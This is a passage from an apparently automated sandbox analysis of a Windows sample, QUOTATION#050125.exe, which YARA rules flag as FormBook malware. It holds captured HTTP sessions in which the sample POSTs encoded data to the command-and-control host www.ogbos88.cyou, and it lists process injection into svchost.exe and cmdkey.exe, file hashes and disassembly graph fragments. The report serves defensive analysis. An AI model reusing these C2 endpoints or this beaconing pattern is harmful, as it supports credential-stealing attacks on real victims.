3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:59:05.402055979 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    78192.168.11.3049903172.67.132.22780
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:59:10.546438932 CET799OUTPOST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 42 4d 77 73 35 6d 77 32 4b 69 5a 37 62 45 42 6a 78 4a 4e 76 51 3d 3d
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZBMws5mw2KiZ7bEBjxJNvQ==
                                                                                    Jan 9, 2025 16:59:10.674277067 CET804INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:59:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:59:10 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysXntGnS8B72ZmhECUMvE4yqTWTyChLUqF7Gaihd0FNAufXV8z2R5UH6OPMbxkmpT2cZ2cdOxsL%2F9eHtFcl6HbI3d4tz23XoVirnY19%2BWH1hv3fq%2FVPviehltB0yOET4ECDw"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a20b48fda489-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    79192.168.11.3049904172.67.132.22780
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:59:13.202044964 CET819OUTPOST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 65 47 31 2f 30 53 4c 47 48 4b 67 39 2b 78 4c 64 46 64 37 6b 3d
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3eG1/0SLGHKg9+xLdFd7k=
                                                                                    Jan 9, 2025 16:59:13.329472065 CET804INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:59:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:59:13 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z2I5WlTKgn8UqTM4RUXGvKzYqLC7EZrClTeuNcpDxpak%2B5v9Wv0xMjbeEl%2F%2FFj3SAqWYUGvVOD4cr4Wk5YVI8dQk0cxbOaPXdVtIhu4GAdYb0Hlr9K1Ow2mTuwLsTlhiL3h5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a21be9fff5fc-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    80192.168.11.3049905172.67.132.22780
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:59:15.861751080 CET2578OUTPOST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 44 6d 48 73 6e 4c 34 6c 33 48 53 30 52 37 46 33 35 58 63 53 55 37 66 55 4a 45 5a 75 59 71 44 78 42 54 77 61 58 34 72 70 36 47 4d 35 6f 47 68 6c 49 31 55 6d 6c 59 39 73 51 72 41 58 54 72 57 45 70 4b 35 4f 6e 31 62 6b 35 68 53 4d 73 33 7a 4a 41 51 69 76 41 4e 4a 73 51 68 51 79 64 63 6d 35 37 58 53 68 7a 33 4d 37 30 65 37 79 32 56 4a 70 59 76 42 4d 2f 70 30 47 36 62 5a 59 46 4c 45 31 37 73 61 44 73 44 58 5a 38 44 38 4e 47 47 5a 42 76 43 6b 77 6f 49 39 78 38 4d 6b 46 6b 35 56 4f 33 30 4e 33 5a 6c 43 7a 4e 42 67 4d 72 47 68 38 35 74 57 51 38 53 50 6a 43 67 66 51 50 38 75 59 35 6d [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj5DmHsnL4l3HS0R7F35XcSU7fUJEZuYqDxBTwaX4rp6GM5oGhlI1UmlY9sQrAXTrWEpK5On1bk5hSMs3zJAQivANJsQhQydcm57XShz3M70e7y2VJpYvBM/p0G6bZYFLE17saDsDXZ8D8NGGZBvCkwoI9x8MkFk5VO30N3ZlCzNBgMrGh85tWQ8SPjCgfQP8uY5mKx19A4aV2kQNFygbqY6Nenmn9LMeUkq1SX1pyBYELdeAHjKuudTwXQly7qej7NTBAxTT0601ykFobqbQFMi+RjZcVbNG+iA7/lm8oHpEtM5qAtaU8jjXY6jscQXlzqvVY0ud0rNFfBRT1zdJCM04oIjBnROixhF2w8TDdCP2Cub4aJznTev+tFCP0A3Z9XAJUvIOOXfuxIGGmV8YRADxypiHmixP8hQcV1vCcfo175gzSzb6U5gpaCUTvl9pVH+KEIie5+RXJ0MizIF18qiN8i68PuIMk4SPjDxHJlYAnaHBbM5zuswp03c+mqAhlBQGWchFfnzh9gLYuSMrPAXcX2pC2bcFBZtnLA9jIwwFFRuMq/GqQL3/uTBEKjHmbgrmG/PCGq602Cc7JgGzP2kL8xOA2b3H/0kzGRELwUE0SAYINvpA13Un9dksgP70+cdjAva0fqPzQUI+VC/J2QeWGrOllVfV563WZ8vKq8O02KBVU6Gxuf4513UfHdp2xJu+CjimJ8bshOkFkRkZEv/XXiij/WHBedO2MQpqykIDMwvmO3p9cKuleFHbtts8uVny+f4FGvUSOgAtWOngYc0kidYIZmSOfcd0ht3WB0vv8YN/4WRDlF4Ik/8VfUlmIWotnr0MyQgyzH5tAXLajD9t0aNDwr/g+pLU3L [TRUNCATED]
                                                                                    Jan 9, 2025 16:59:15.861814022 CET1358OUTData Raw: 4a 38 6d 51 34 6a 2b 68 2f 39 6c 4f 6d 32 46 2f 47 55 44 58 51 47 5a 4b 5a 57 63 48 74 70 56 34 54 55 44 49 79 4a 79 42 73 62 72 44 30 51 51 33 72 50 6b 73 73 41 42 52 52 79 67 49 4f 44 6a 32 73 47 56 35 6b 65 6b 32 78 79 63 41 48 37 4b 6e 7a 4d
                                                                                    Data Ascii: J8mQ4j+h/9lOm2F/GUDXQGZKZWcHtpV4TUDIyJyBsbrD0QQ3rPkssABRRygIODj2sGV5kek2xycAH7KnzM1Ct8y5KSdJVCSnJ9pdxqFrn1JoGF0tB0MBpetM0M6xsPy3Y1wPgg9KnYdiEs5a5LIdQaU8jdzkdDya3DAQHCDmPImh8OXgghynKsNwRFsIhzoShYKiqCV2Q7EJzoAawJvRn3OKTTmTZXsw9S8RR1KNLEimPm9I9My
                                                                                    Jan 9, 2025 16:59:15.987556934 CET808INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:59:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:59:15 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Swq6fxBwal2IZNOByHd5oKPbFgcHBXL%2BdP%2FXWnOZ6LI5r3DNa57SUY105LSthTH%2F1HwaGU%2F7DLjYEXUdjLLgKRvSYDV849pmxyLoPFhzL9OO7bbvP%2BOFUmj0St2z2oNrk8Uj"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a22c8ad2e80d-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    81192.168.11.3049906172.67.132.22780
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:59:18.525099039 CET535OUTGET /kj1o/?80k=lRapCPMXgDk&6B-l7F=aFAzn/LT2mOAaNQADN8poQDHC/ShywB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQsmt/Lr8OGOl6Yl/nOLw= HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:59:18.657053947 CET781INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:59:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:59:18 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JUBbrZ%2B4VfL3zQsjhx1JUZhgtSqYZrioJEZEnT2eNfJ3LcfVG7cj6Cog0SN2kR7fVO01lj3ZPW8zvbxohNEokyEBOpFPHOEHTkvPEtMIvUOZBn6%2F6%2BujoHD0icr8pt6yTwXc"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a23d2f32eaf5-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:10:52:32
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Users\user\Desktop\QUOTATION#050125.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\QUOTATION#050125.exe"
                                                                                    Imagebase:0xc0000
                                                                                    File size:1'755'136 bytes
                                                                                    MD5 hash:B1261DE24D9BCBF7395AE21722D32A37
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:10:52:33
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\QUOTATION#050125.exe"
                                                                                    Imagebase:0xe30000
                                                                                    File size:47'016 bytes
                                                                                    MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:10:53:29
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe"
                                                                                    Imagebase:0x3c0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:10:53:31
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Windows\SysWOW64\cmdkey.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                                                    Imagebase:0xc80000
                                                                                    File size:17'408 bytes
                                                                                    MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:10:53:44
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe"
                                                                                    Imagebase:0x3c0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:10:53:57
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff745470000
                                                                                    File size:675'744 bytes
                                                                                    MD5 hash:7B12552FD2A5948256B20EC97B708F94
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.8%
                                                                                      Dynamic/Decrypted Code Coverage:1.1%
                                                                                      Signature Coverage:3.1%
                                                                                      Total number of Nodes:1714
                                                                                      Total number of Limit Nodes:66
                                                                                      execution_graph 97624 e1a480 97638 e180d0 97624->97638 97626 e1a557 97641 e1a370 97626->97641 97628 e1a580 CreateFileW 97630 e1a5cf 97628->97630 97631 e1a5d4 97628->97631 97631->97630 97632 e1a5eb VirtualAlloc 97631->97632 97632->97630 97633 e1a609 ReadFile 97632->97633 97633->97630 97634 e1a624 97633->97634 97635 e19370 13 API calls 97634->97635 97636 e1a657 97635->97636 97637 e1a67a ExitProcess 97636->97637 97637->97630 97644 e1b580 GetPEB 97638->97644 97640 e1875b 97640->97626 97642 e1a379 Sleep 97641->97642 97643 e1a387 97642->97643 97645 e1b5aa 97644->97645 97645->97640 97646 c1cad SystemParametersInfoW 97647 113f75 97658 dceb1 97647->97658 97649 113f8b 97650 114006 97649->97650 97725 de300 23 API calls 97649->97725 97667 cbf40 97650->97667 97652 113fe6 97655 114052 97652->97655 97726 131abf 22 API calls 97652->97726 97656 114a88 97655->97656 97727 13359c 82 API calls 97655->97727 97659 dcebf 97658->97659 97660 dced2 97658->97660 97728 caceb 23 API calls 97659->97728 97662 dcf05 97660->97662 97663 dced7 97660->97663 97739 caceb 23 API calls 97662->97739 97729 dfddb 97663->97729 97665 dcec9 97665->97649 97752 cadf0 97667->97752 97669 cbf9d 97670 cbfa9 97669->97670 97671 1104b6 97669->97671 97673 cc01e 97670->97673 97674 1104c6 97670->97674 97781 13359c 82 API calls 97671->97781 97757 cac91 97673->97757 97782 13359c 82 API calls 97674->97782 97677 1104f5 97678 11055a 97677->97678 97783 dd217 207 API calls 97677->97783 97710 cc603 97678->97710 97784 13359c 82 API calls 97678->97784 97680 127120 22 API calls 97722 cc039 97680->97722 97683 cc7da 97770 dfe0b 97683->97770 97688 cec40 207 API calls 97688->97722 97689 11091a 97821 133209 23 API calls 97689->97821 97690 dfe0b 22 API calls 97723 cc350 97690->97723 97691 caf8a 22 API calls 97691->97722 97692 cc808 97692->97690 97695 1108a5 97792 cec40 97695->97792 97698 1108cf 97698->97710 97816 ca81b 97698->97816 97699 110591 97785 13359c 82 API calls 97699->97785 97700 1108f6 97820 13359c 82 API calls 97700->97820 97706 dfddb 22 API calls 97706->97722 97707 cc237 97708 cc253 97707->97708 97822 ca8c7 22 API calls 97707->97822 97712 110976 97708->97712 97716 cc297 97708->97716 97710->97655 97711 dfe0b 22 API calls 97711->97722 97823 caceb 23 API calls 97712->97823 97718 1109bf 97716->97718 97768 caceb 23 API calls 97716->97768 97717 cc335 97717->97718 97719 cc342 97717->97719 97718->97710 97824 13359c 82 API calls 97718->97824 97769 ca704 22 API calls 97719->97769 97720 cbbe0 40 API calls 97720->97722 97722->97677 97722->97678 97722->97680 97722->97683 97722->97688 97722->97689 97722->97691 97722->97692 97722->97695 97722->97699 97722->97700 97722->97706 97722->97707 97722->97710 97722->97711 97722->97718 97722->97720 97761 cad81 97722->97761 97786 127099 22 API calls 97722->97786 97787 145745 54 API calls 97722->97787 97788 daa42 22 API calls 97722->97788 97789 12f05c 40 API calls 97722->97789 97790 ca993 41 API calls 97722->97790 97791 caceb 23 API calls 97722->97791 97724 